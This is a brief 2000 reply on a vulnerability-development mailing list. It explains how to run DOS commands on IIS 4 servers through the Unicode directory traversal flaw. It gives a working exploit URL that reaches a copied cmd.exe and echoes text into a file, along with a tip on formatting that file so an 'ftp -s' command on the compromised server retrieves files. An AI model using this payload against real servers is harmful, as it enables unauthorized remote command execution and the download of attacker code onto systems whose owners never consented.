Vulnerability Development mailing list archives

Re: dos commands via iis 4

From: Unicraft Systems <unicraft () OTERO CL>
Date: Fri, 10 Nov 2000 12:05:21 -0300

However...
If your are building a text file to make use of an FTP command with the -s
option... the string should be this way
http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack
file.txt

Leaving a space (using a +) between the text and the ">" will cause the FTP
command not to function when it retrieves the information from the file.

My $0.02

Regards,
Gabriel Aguilera